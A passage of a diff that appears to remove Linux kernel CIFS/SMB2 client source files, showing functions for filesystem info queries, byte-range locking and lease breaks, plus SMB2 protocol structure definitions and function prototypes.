+-		le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
+-	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
+-			       le32_to_cpu(rsp->OutputBufferLength), &rsp_iov,
+-			       sizeof(FILE_SYSTEM_POSIX_INFO));
+-	if (!rc)
+-		copy_posix_fs_info_to_kstatfs(info, fsdata);
+-
+-posix_qfsinf_exit:
+-	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-int
+-SMB2_QFS_info(const unsigned int xid, struct cifs_tcon *tcon,
+-	      u64 persistent_fid, u64 volatile_fid, struct kstatfs *fsdata)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_query_info_rsp *rsp = NULL;
+-	struct kvec iov;
+-	struct kvec rsp_iov;
+-	int rc = 0;
+-	int resp_buftype;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	struct smb2_fs_full_size_info *info = NULL;
+-	int flags = 0;
+-
+-	rc = build_qfs_info_req(&iov, tcon, server,
+-				FS_FULL_SIZE_INFORMATION,
+-				sizeof(struct smb2_fs_full_size_info),
+-				persistent_fid, volatile_fid);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = &iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(iov.iov_base);
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+-		goto qfsinf_exit;
+-	}
+-	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
+-
+-	info = (struct smb2_fs_full_size_info *)(
+-		le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
+-	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
+-			       le32_to_cpu(rsp->OutputBufferLength), &rsp_iov,
+-			       sizeof(struct smb2_fs_full_size_info));
+-	if (!rc)
+-		smb2_copy_fs_info_to_kstatfs(info, fsdata);
+-
+-qfsinf_exit:
+-	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-int
+-SMB2_QFS_attr(const unsigned int xid, struct cifs_tcon *tcon,
+-	      u64 persistent_fid, u64 volatile_fid, int level)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_query_info_rsp *rsp = NULL;
+-	struct kvec iov;
+-	struct kvec rsp_iov;
+-	int rc = 0;
+-	int resp_buftype, max_len, min_len;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	unsigned int rsp_len, offset;
+-	int flags = 0;
+-
+-	if (level == FS_DEVICE_INFORMATION) {
+-		max_len = sizeof(FILE_SYSTEM_DEVICE_INFO);
+-		min_len = sizeof(FILE_SYSTEM_DEVICE_INFO);
+-	} else if (level == FS_ATTRIBUTE_INFORMATION) {
+-		max_len = sizeof(FILE_SYSTEM_ATTRIBUTE_INFO);
+-		min_len = MIN_FS_ATTR_INFO_SIZE;
+-	} else if (level == FS_SECTOR_SIZE_INFORMATION) {
+-		max_len = sizeof(struct smb3_fs_ss_info);
+-		min_len = sizeof(struct smb3_fs_ss_info);
+-	} else if (level == FS_VOLUME_INFORMATION) {
+-		max_len = sizeof(struct smb3_fs_vol_info) + MAX_VOL_LABEL_LEN;
+-		min_len = sizeof(struct smb3_fs_vol_info);
+-	} else {
+-		cifs_dbg(FYI, "Invalid qfsinfo level %d\n", level);
+-		return -EINVAL;
+-	}
+-
+-	rc = build_qfs_info_req(&iov, tcon, server,
+-				level, max_len,
+-				persistent_fid, volatile_fid);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = &iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(iov.iov_base);
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+-		goto qfsattr_exit;
+-	}
+-	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
+-
+-	rsp_len = le32_to_cpu(rsp->OutputBufferLength);
+-	offset = le16_to_cpu(rsp->OutputBufferOffset);
+-	rc = smb2_validate_iov(offset, rsp_len, &rsp_iov, min_len);
+-	if (rc)
+-		goto qfsattr_exit;
+-
+-	if (level == FS_ATTRIBUTE_INFORMATION)
+-		memcpy(&tcon->fsAttrInfo, offset
+-			+ (char *)rsp, min_t(unsigned int,
+-			rsp_len, max_len));
+-	else if (level == FS_DEVICE_INFORMATION)
+-		memcpy(&tcon->fsDevInfo, offset
+-			+ (char *)rsp, sizeof(FILE_SYSTEM_DEVICE_INFO));
+-	else if (level == FS_SECTOR_SIZE_INFORMATION) {
+-		struct smb3_fs_ss_info *ss_info = (struct smb3_fs_ss_info *)
+-			(offset + (char *)rsp);
+-		tcon->ss_flags = le32_to_cpu(ss_info->Flags);
+-		tcon->perf_sector_size =
+-			le32_to_cpu(ss_info->PhysicalBytesPerSectorForPerf);
+-	} else if (level == FS_VOLUME_INFORMATION) {
+-		struct smb3_fs_vol_info *vol_info = (struct smb3_fs_vol_info *)
+-			(offset + (char *)rsp);
+-		tcon->vol_serial_number = vol_info->VolumeSerialNumber;
+-		tcon->vol_create_time = vol_info->VolumeCreationTime;
+-	}
+-
+-qfsattr_exit:
+-	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-int
+-smb2_lockv(const unsigned int xid, struct cifs_tcon *tcon,
+-	   const __u64 persist_fid, const __u64 volatile_fid, const __u32 pid,
+-	   const __u32 num_lock, struct smb2_lock_element *buf)
+-{
+-	struct smb_rqst rqst;
+-	int rc = 0;
+-	struct smb2_lock_req *req = NULL;
+-	struct kvec iov[2];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-	unsigned int count;
+-	int flags = CIFS_NO_RSP_BUF;
+-	unsigned int total_len;
+-	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
+-
+-	cifs_dbg(FYI, "smb2_lockv num lock %d\n", num_lock);
+-
+-	rc = smb2_plain_req_init(SMB2_LOCK, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	req->hdr.Id.SyncId.ProcessId = cpu_to_le32(pid);
+-	req->LockCount = cpu_to_le16(num_lock);
+-
+-	req->PersistentFileId = persist_fid;
+-	req->VolatileFileId = volatile_fid;
+-
+-	count = num_lock * sizeof(struct smb2_lock_element);
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len - sizeof(struct smb2_lock_element);
+-	iov[1].iov_base = (char *)buf;
+-	iov[1].iov_len = count;
+-
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_locks);
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 2;
+-
+-	rc = cifs_send_recv(xid, tcon->ses, server,
+-			    &rqst, &resp_buf_type, flags,
+-			    &rsp_iov);
+-	cifs_small_buf_release(req);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in smb2_lockv = %d\n", rc);
+-		cifs_stats_fail_inc(tcon, SMB2_LOCK_HE);
+-		trace_smb3_lock_err(xid, persist_fid, tcon->tid,
+-				    tcon->ses->Suid, rc);
+-	}
+-
+-	return rc;
+-}
+-
+-int
+-SMB2_lock(const unsigned int xid, struct cifs_tcon *tcon,
+-	  const __u64 persist_fid, const __u64 volatile_fid, const __u32 pid,
+-	  const __u64 length, const __u64 offset, const __u32 lock_flags,
+-	  const bool wait)
+-{
+-	struct smb2_lock_element lock;
+-
+-	lock.Offset = cpu_to_le64(offset);
+-	lock.Length = cpu_to_le64(length);
+-	lock.Flags = cpu_to_le32(lock_flags);
+-	if (!wait && lock_flags != SMB2_LOCKFLAG_UNLOCK)
+-		lock.Flags |= cpu_to_le32(SMB2_LOCKFLAG_FAIL_IMMEDIATELY);
+-
+-	return smb2_lockv(xid, tcon, persist_fid, volatile_fid, pid, 1, &lock);
+-}
+-
+-int
+-SMB2_lease_break(const unsigned int xid, struct cifs_tcon *tcon,
+-		 __u8 *lease_key, const __le32 lease_state)
+-{
+-	struct smb_rqst rqst;
+-	int rc;
+-	struct smb2_lease_ack *req = NULL;
+-	struct cifs_ses *ses = tcon->ses;
+-	int flags = CIFS_OBREAK_OP;
+-	unsigned int total_len;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-	__u64 *please_key_high;
+-	__u64 *please_key_low;
+-	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
+-
+-	cifs_dbg(FYI, "SMB2_lease_break\n");
+-	rc = smb2_plain_req_init(SMB2_OPLOCK_BREAK, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	req->hdr.CreditRequest = cpu_to_le16(1);
+-	req->StructureSize = cpu_to_le16(36);
+-	total_len += 12;
+-
+-	memcpy(req->LeaseKey, lease_key, 16);
+-	req->LeaseState = lease_state;
+-
+-	flags |= CIFS_NO_RSP_BUF;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buf_type, flags, &rsp_iov);
+-	cifs_small_buf_release(req);
+-
+-	please_key_low = (__u64 *)lease_key;
+-	please_key_high = (__u64 *)(lease_key+8);
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_OPLOCK_BREAK_HE);
+-		trace_smb3_lease_err(le32_to_cpu(lease_state), tcon->tid,
+-			ses->Suid, *please_key_low, *please_key_high, rc);
+-		cifs_dbg(FYI, "Send error in Lease Break = %d\n", rc);
+-	} else
+-		trace_smb3_lease_done(le32_to_cpu(lease_state), tcon->tid,
+-			ses->Suid, *please_key_low, *please_key_high);
+-
+-	return rc;
+-}
+diff --git a/fs/cifs/smb2pdu.h b/fs/cifs/smb2pdu.h
+deleted file mode 100644
+index 1237bb86e93a8..0000000000000
+--- a/fs/cifs/smb2pdu.h
++++ /dev/null
+@@ -1,434 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2009, 2013
+- *                 Etersoft, 2012
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Pavel Shilovsky (pshilovsky@samba.org) 2012
+- *
+- */
+-
+-#ifndef _SMB2PDU_H
+-#define _SMB2PDU_H
+-
+-#include <net/sock.h>
+-#include "cifsacl.h"
+-
+-/* 52 transform hdr + 64 hdr + 88 create rsp */
+-#define SMB2_TRANSFORM_HEADER_SIZE 52
+-#define MAX_SMB2_HDR_SIZE 204
+-
+-/* The total header size for SMB2 read and write */
+-#define SMB2_READWRITE_PDU_HEADER_SIZE (48 + sizeof(struct smb2_hdr))
+-
+-/* See MS-SMB2 2.2.43 */
+-struct smb2_rdma_transform {
+-	__le16 RdmaDescriptorOffset;
+-	__le16 RdmaDescriptorLength;
+-	__le32 Channel; /* for values see channel description in smb2 read above */
+-	__le16 TransformCount;
+-	__le16 Reserved1;
+-	__le32 Reserved2;
+-} __packed;
+-
+-/* TransformType */
+-#define SMB2_RDMA_TRANSFORM_TYPE_ENCRYPTION	0x0001
+-#define SMB2_RDMA_TRANSFORM_TYPE_SIGNING	0x0002
+-
+-struct smb2_rdma_crypto_transform {
+-	__le16	TransformType;
+-	__le16	SignatureLength;
+-	__le16	NonceLength;
+-	__u16	Reserved;
+-	__u8	Signature[]; /* variable length */
+-	/* u8 Nonce[] */
+-	/* followed by padding */
+-} __packed;
+-
+-/*
+- *	Definitions for SMB2 Protocol Data Units (network frames)
+- *
+- *  See MS-SMB2.PDF specification for protocol details.
+- *  The Naming convention is the lower case version of the SMB2
+- *  command code name for the struct. Note that structures must be packed.
+- *
+- */
+-
+-#define COMPOUND_FID 0xFFFFFFFFFFFFFFFFULL
+-
+-#define SMB2_SYMLINK_STRUCT_SIZE \
+-	(sizeof(struct smb2_err_rsp) - 1 + sizeof(struct smb2_symlink_err_rsp))
+-
+-#define SYMLINK_ERROR_TAG 0x4c4d5953
+-
+-struct smb2_symlink_err_rsp {
+-	__le32 SymLinkLength;
+-	__le32 SymLinkErrorTag;
+-	__le32 ReparseTag;
+-	__le16 ReparseDataLength;
+-	__le16 UnparsedPathLength;
+-	__le16 SubstituteNameOffset;
+-	__le16 SubstituteNameLength;
+-	__le16 PrintNameOffset;
+-	__le16 PrintNameLength;
+-	__le32 Flags;
+-	__u8  PathBuffer[];
+-} __packed;
+-
+-/* SMB 3.1.1 and later dialects. See MS-SMB2 section 2.2.2.1 */
+-struct smb2_error_context_rsp {
+-	__le32 ErrorDataLength;
+-	__le32 ErrorId;
+-	__u8  ErrorContextData; /* ErrorDataLength long array */
+-} __packed;
+-
+-/* ErrorId values */
+-#define SMB2_ERROR_ID_DEFAULT		0x00000000
+-#define SMB2_ERROR_ID_SHARE_REDIRECT	cpu_to_le32(0x72645253)	/* "rdRS" */
+-
+-/* Defines for Type field below (see MS-SMB2 2.2.2.2.2.1) */
+-#define MOVE_DST_IPADDR_V4	cpu_to_le32(0x00000001)
+-#define MOVE_DST_IPADDR_V6	cpu_to_le32(0x00000002)
+-
+-struct move_dst_ipaddr {
+-	__le32 Type;
+-	__u32  Reserved;
+-	__u8   address[16]; /* IPv4 followed by 12 bytes rsvd or IPv6 address */
+-} __packed;
+-
+-struct share_redirect_error_context_rsp {
+-	__le32 StructureSize;
+-	__le32 NotificationType;
+-	__le32 ResourceNameOffset;
+-	__le32 ResourceNameLength;
+-	__le16 Reserved;
+-	__le16 TargetType;
+-	__le32 IPAddrCount;
+-	struct move_dst_ipaddr IpAddrMoveList[];
+-	/* __u8 ResourceName[] */ /* Name of share as counted Unicode string */
+-} __packed;
+-
+-/*
+- * Maximum number of iovs we need for an open/create request.
+- * [0] : struct smb2_create_req
+- * [1] : path
+- * [2] : lease context
+- * [3] : durable context
+- * [4] : posix context
+- * [5] : time warp context
+- * [6] : query id context
+- * [7] : compound padding
+- */
+-#define SMB2_CREATE_IOV_SIZE 8
+-
+-/*
+- * Maximum size of a SMB2_CREATE response is 64 (smb2 header) +
+- * 88 (fixed part of create response) + 520 (path) + 208 (contexts) +
+- * 2 bytes of padding.
+- */
+-#define MAX_SMB2_CREATE_RESPONSE_SIZE 880
+-
+-#define SMB2_LEASE_READ_CACHING_HE	0x01
+-#define SMB2_LEASE_HANDLE_CACHING_HE	0x02
+-#define SMB2_LEASE_WRITE_CACHING_HE	0x04
+-
+-struct create_durable {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	union {
+-		__u8  Reserved[16];
+-		struct {
+-			__u64 PersistentFileId;
+-			__u64 VolatileFileId;
+-		} Fid;
+-	} Data;
+-} __packed;
+-
+-/* See MS-SMB2 2.2.13.2.11 */
+-/* Flags */
+-#define SMB2_DHANDLE_FLAG_PERSISTENT	0x00000002
+-struct durable_context_v2 {
+-	__le32 Timeout;
+-	__le32 Flags;
+-	__u64 Reserved;
+-	__u8 CreateGuid[16];
+-} __packed;
+-
+-struct create_durable_v2 {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct durable_context_v2 dcontext;
+-} __packed;
+-
+-/* See MS-SMB2 2.2.13.2.12 */
+-struct durable_reconnect_context_v2 {
+-	struct {
+-		__u64 PersistentFileId;
+-		__u64 VolatileFileId;
+-	} Fid;
+-	__u8 CreateGuid[16];
+-	__le32 Flags; /* see above DHANDLE_FLAG_PERSISTENT */
+-} __packed;
+-
+-/* See MS-SMB2 2.2.14.2.9 */
+-struct create_on_disk_id {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le64 DiskFileId;
+-	__le64 VolumeId;
+-	__u32  Reserved[4];
+-} __packed;
+-
+-/* See MS-SMB2 2.2.14.2.12 */
+-struct durable_reconnect_context_v2_rsp {
+-	__le32 Timeout;
+-	__le32 Flags; /* see above DHANDLE_FLAG_PERSISTENT */
+-} __packed;
+-
+-struct create_durable_handle_reconnect_v2 {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct durable_reconnect_context_v2 dcontext;
+-	__u8   Pad[4];
+-} __packed;
+-
+-/* See MS-SMB2 2.2.13.2.5 */
+-struct crt_twarp_ctxt {
+-	struct create_context ccontext;
+-	__u8	Name[8];
+-	__le64	Timestamp;
+-
+-} __packed;
+-
+-/* See MS-SMB2 2.2.13.2.9 */
+-struct crt_query_id_ctxt {
+-	struct create_context ccontext;
+-	__u8	Name[8];
+-} __packed;
+-
+-struct crt_sd_ctxt {
+-	struct create_context ccontext;
+-	__u8	Name[8];
+-	struct smb3_sd sd;
+-} __packed;
+-
+-
+-#define COPY_CHUNK_RES_KEY_SIZE	24
+-struct resume_key_req {
+-	char ResumeKey[COPY_CHUNK_RES_KEY_SIZE];
+-	__le32	ContextLength;	/* MBZ */
+-	char	Context[];	/* ignored, Windows sets to 4 bytes of zero */
+-} __packed;
+-
+-/* this goes in the ioctl buffer when doing a copychunk request */
+-struct copychunk_ioctl {
+-	char SourceKey[COPY_CHUNK_RES_KEY_SIZE];
+-	__le32 ChunkCount; /* we are only sending 1 */
+-	__le32 Reserved;
+-	/* array will only be one chunk long for us */
+-	__le64 SourceOffset;
+-	__le64 TargetOffset;
+-	__le32 Length; /* how many bytes to copy */
+-	__u32 Reserved2;
+-} __packed;
+-
+-struct copychunk_ioctl_rsp {
+-	__le32 ChunksWritten;
+-	__le32 ChunkBytesWritten;
+-	__le32 TotalBytesWritten;
+-} __packed;
+-
+-/* See MS-FSCC 2.3.29 and 2.3.30 */
+-struct get_retrieval_pointer_count_req {
+-	__le64 StartingVcn; /* virtual cluster number (signed) */
+-} __packed;
+-
+-struct get_retrieval_pointer_count_rsp {
+-	__le32 ExtentCount;
+-} __packed;
+-
+-/*
+- * See MS-FSCC 2.3.33 and 2.3.34
+- * request is the same as get_retrieval_point_count_req struct above
+- */
+-struct smb3_extents {
+-	__le64 NextVcn;
+-	__le64 Lcn; /* logical cluster number */
+-} __packed;
+-
+-struct get_retrieval_pointers_refcount_rsp {
+-	__le32 ExtentCount;
+-	__u32  Reserved;
+-	__le64 StartingVcn;
+-	struct smb3_extents extents[];
+-} __packed;
+-
+-/* See MS-DFSC 2.2.2 */
+-struct fsctl_get_dfs_referral_req {
+-	__le16 MaxReferralLevel;
+-	__u8 RequestFileName[];
+-} __packed;
+-
+-/* DFS response is struct get_dfs_refer_rsp */
+-
+-/* See MS-SMB2 2.2.31.3 */
+-struct network_resiliency_req {
+-	__le32 Timeout;
+-	__le32 Reserved;
+-} __packed;
+-/* There is no buffer for the response ie no struct network_resiliency_rsp */
+-
+-#define RSS_CAPABLE	cpu_to_le32(0x00000001)
+-#define RDMA_CAPABLE	cpu_to_le32(0x00000002)
+-
+-#define INTERNETWORK	cpu_to_le16(0x0002)
+-#define INTERNETWORKV6	cpu_to_le16(0x0017)
+-
+-struct network_interface_info_ioctl_rsp {
+-	__le32 Next; /* next interface. zero if this is last one */
+-	__le32 IfIndex;
+-	__le32 Capability; /* RSS or RDMA Capable */
+-	__le32 Reserved;
+-	__le64 LinkSpeed;
+-	__le16 Family;
+-	__u8 Buffer[126];
+-} __packed;
+-
+-struct iface_info_ipv4 {
+-	__be16 Port;
+-	__be32 IPv4Address;
+-	__be64 Reserved;
+-} __packed;
+-
+-struct iface_info_ipv6 {
+-	__be16 Port;
+-	__be32 FlowInfo;
+-	__u8   IPv6Address[16];
+-	__be32 ScopeId;
+-} __packed;
+-
+-#define NO_FILE_ID 0xFFFFFFFFFFFFFFFFULL /* general ioctls to srv not to file */
+-
+-struct compress_ioctl {
+-	__le16 CompressionState; /* See cifspdu.h for possible flag values */
+-} __packed;
+-
+-/*
+- * Maximum number of iovs we need for an ioctl request.
+- * [0] : struct smb2_ioctl_req
+- * [1] : in_data
+- */
+-#define SMB2_IOCTL_IOV_SIZE 2
+-
+-/*
+- *	PDU query infolevel structure definitions
+- *	BB consider moving to a different header
+- */
+-
+-struct smb2_file_full_ea_info { /* encoding of response for level 15 */
+-	__le32 next_entry_offset;
+-	__u8   flags;
+-	__u8   ea_name_length;
+-	__le16 ea_value_length;
+-	char   ea_data[]; /* \0 terminated name plus value */
+-} __packed; /* level 15 Set */
+-
+-struct smb2_file_reparse_point_info {
+-	__le64 IndexNumber;
+-	__le32 Tag;
+-} __packed;
+-
+-struct smb2_file_network_open_info {
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;
+-	__le32 Attributes;
+-	__le32 Reserved;
+-} __packed; /* level 34 Query also similar returned in close rsp and open rsp */
+-
+-/* See MS-FSCC 2.4.21 */
+-struct smb2_file_id_information {
+-	__le64	VolumeSerialNumber;
+-	__u64  PersistentFileId; /* opaque endianness */
+-	__u64  VolatileFileId; /* opaque endianness */
+-} __packed; /* level 59 */
+-
+-/* See MS-FSCC 2.4.18 */
+-struct smb2_file_id_extd_directory_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 FileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* EA size */
+-	__le32 ReparsePointTag; /* valid if FILE_ATTR_REPARSE_POINT set in FileAttributes */
+-	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit */
+-	char FileName[1];
+-} __packed; /* level 60 */
+-
+-extern char smb2_padding[7];
+-
+-/* equivalent of the contents of SMB3.1.1 POSIX open context response */
+-struct create_posix_rsp {
+-	u32 nlink;
+-	u32 reparse_tag;
+-	u32 mode;
+-	struct cifs_sid owner; /* var-sized on the wire */
+-	struct cifs_sid group; /* var-sized on the wire */
+-} __packed;
+-
+-#define SMB2_QUERY_DIRECTORY_IOV_SIZE 2
+-
+-/*
+- * SMB2-only POSIX info level for query dir
+- *
+- * See posix_info_sid_size(), posix_info_extra_size() and
+- * posix_info_parse() to help with the handling of this struct.
+- */
+-struct smb2_posix_info {
+-	__le32 NextEntryOffset;
+-	__u32 Ignored;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 DosAttributes;
+-	__le64 Inode;
+-	__le32 DeviceId;
+-	__le32 Zero;
+-	/* beginning of POSIX Create Context Response */
+-	__le32 HardLinks;
+-	__le32 ReparseTag;
+-	__le32 Mode;
+-	/*
+-	 * var sized owner SID
+-	 * var sized group SID
+-	 * le32 filenamelength
+-	 * u8  filename[]
+-	 */
+-} __packed;
+-
+-/*
+- * Parsed version of the above struct. Allows direct access to the
+- * variable length fields
+- */
+-struct smb2_posix_info_parsed {
+-	const struct smb2_posix_info *base;
+-	size_t size;
+-	struct cifs_sid owner;
+-	struct cifs_sid group;
+-	int name_len;
+-	const u8 *name;
+-};
+-
+-#endif				/* _SMB2PDU_H */
+diff --git a/fs/cifs/smb2proto.h b/fs/cifs/smb2proto.h
+deleted file mode 100644
+index be21b5d26f67e..0000000000000
+--- a/fs/cifs/smb2proto.h
++++ /dev/null
+@@ -1,284 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002, 2011
+- *                 Etersoft, 2012
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Pavel Shilovsky (pshilovsky@samba.org) 2012
+- *
+- */
+-#ifndef _SMB2PROTO_H
+-#define _SMB2PROTO_H
+-#include <linux/nls.h>
+-#include <linux/key-type.h>
+-
+-struct statfs;
+-struct smb_rqst;
+-
+-/*
+- *****************************************************************
+- * All Prototypes
+- *****************************************************************
+- */
+-extern int map_smb2_to_linux_error(char *buf, bool log_err);
+-extern int smb2_check_message(char *buf, unsigned int length,
+-			      struct TCP_Server_Info *server);
+-extern unsigned int smb2_calc_size(void *buf);
+-extern char *smb2_get_data_area_len(int *off, int *len,
+-				    struct smb2_hdr *shdr);
+-extern __le16 *cifs_convert_path_to_utf16(const char *from,
+-					  struct cifs_sb_info *cifs_sb);
+-
+-extern int smb2_verify_signature(struct smb_rqst *, struct TCP_Server_Info *);
+-extern int smb2_check_receive(struct mid_q_entry *mid,
+-			      struct TCP_Server_Info *server, bool log_error);
+-extern struct mid_q_entry *smb2_setup_request(struct cifs_ses *ses,
+-					      struct TCP_Server_Info *,
+-					      struct smb_rqst *rqst);
+-extern struct mid_q_entry *smb2_setup_async_request(
+-			struct TCP_Server_Info *server, struct smb_rqst *rqst);
+-extern struct cifs_ses *smb2_find_smb_ses(struct TCP_Server_Info *server,
+-					   __u64 ses_id);
+-extern struct cifs_tcon *smb2_find_smb_tcon(struct TCP_Server_Info *server,
+-						__u64 ses_id, __u32  tid);
+-extern int smb2_calc_signature(struct smb_rqst *rqst,
+-				struct TCP_Server_Info *server,
+-				bool allocate_crypto);
+-extern int smb3_calc_signature(struct smb_rqst *rqst,
+-				struct TCP_Server_Info *server,
+-				bool allocate_crypto);
+-extern void smb2_echo_request(struct work_struct *work);
+-extern __le32 smb2_get_lease_state(struct cifsInodeInfo *cinode);
+-extern bool smb2_is_valid_oplock_break(char *buffer,
+-				       struct TCP_Server_Info *srv);
+-extern int smb3_handle_read_data(struct TCP_Server_Info *server,
+-				 struct mid_q_entry *mid);
+-extern int smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+-				struct cifs_sb_info *cifs_sb, const char *path,
+-				__u32 *reparse_tag);
+-int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+-			 struct cifs_sb_info *cifs_sb, const char *full_path,
+-			 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse);
+-extern int smb2_set_path_size(const unsigned int xid, struct cifs_tcon *tcon,
+-			      const char *full_path, __u64 size,
+-			      struct cifs_sb_info *cifs_sb, bool set_alloc);
+-extern int smb2_set_file_info(struct inode *inode, const char *full_path,
+-			      FILE_BASIC_INFO *buf, const unsigned int xid);
+-extern int smb311_posix_mkdir(const unsigned int xid, struct inode *inode,
+-			       umode_t mode, struct cifs_tcon *tcon,
+-			       const char *full_path,
+-			       struct cifs_sb_info *cifs_sb);
+-extern int smb2_mkdir(const unsigned int xid, struct inode *inode,
+-		      umode_t mode, struct cifs_tcon *tcon,
+-		      const char *name, struct cifs_sb_info *cifs_sb);
+-extern void smb2_mkdir_setinfo(struct inode *inode, const char *full_path,
+-			       struct cifs_sb_info *cifs_sb,
+-			       struct cifs_tcon *tcon, const unsigned int xid);
+-extern int smb2_rmdir(const unsigned int xid, struct cifs_tcon *tcon,
+-		      const char *name, struct cifs_sb_info *cifs_sb);
+-extern int smb2_unlink(const unsigned int xid, struct cifs_tcon *tcon,
+-		       const char *name, struct cifs_sb_info *cifs_sb);
+-extern int smb2_rename_path(const unsigned int xid, struct cifs_tcon *tcon,
+-			    const char *from_name, const char *to_name,
+-			    struct cifs_sb_info *cifs_sb);
+-extern int smb2_create_hardlink(const unsigned int xid, struct cifs_tcon *tcon,
+-				const char *from_name, const char *to_name,
+-				struct cifs_sb_info *cifs_sb);
+-extern int smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-			struct cifs_sb_info *cifs_sb, const unsigned char *path,
+-			char *pbuf, unsigned int *pbytes_written);
+-extern int smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-			  struct cifs_sb_info *cifs_sb,
+-			  const unsigned char *path, char *pbuf,
+-			  unsigned int *pbytes_read);
+-int smb2_parse_symlink_response(struct cifs_sb_info *cifs_sb, const struct kvec *iov, char **path);
+-int smb2_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
+-		   void *buf);
+-extern int smb2_unlock_range(struct cifsFileInfo *cfile,
+-			     struct file_lock *flock, const unsigned int xid);
+-extern int smb2_push_mandatory_locks(struct cifsFileInfo *cfile);
+-extern void smb2_reconnect_server(struct work_struct *work);
+-extern int smb3_crypto_aead_allocate(struct TCP_Server_Info *server);
+-extern unsigned long smb_rqst_len(struct TCP_Server_Info *server,
+-				  struct smb_rqst *rqst);
+-extern void smb2_set_next_command(struct cifs_tcon *tcon,
+-				  struct smb_rqst *rqst);
+-extern void smb2_set_related(struct smb_rqst *rqst);
+-
+-/*
+- * SMB2 Worker functions - most of protocol specific implementation details
+- * are contained within these calls.
+- */
+-extern int SMB2_negotiate(const unsigned int xid,
+-			  struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server);
+-extern int SMB2_sess_setup(const unsigned int xid, struct cifs_ses *ses,
+-			   struct TCP_Server_Info *server,
+-			   const struct nls_table *nls_cp);
+-extern int SMB2_logoff(const unsigned int xid, struct cifs_ses *ses);
+-extern int SMB2_tcon(const unsigned int xid, struct cifs_ses *ses,
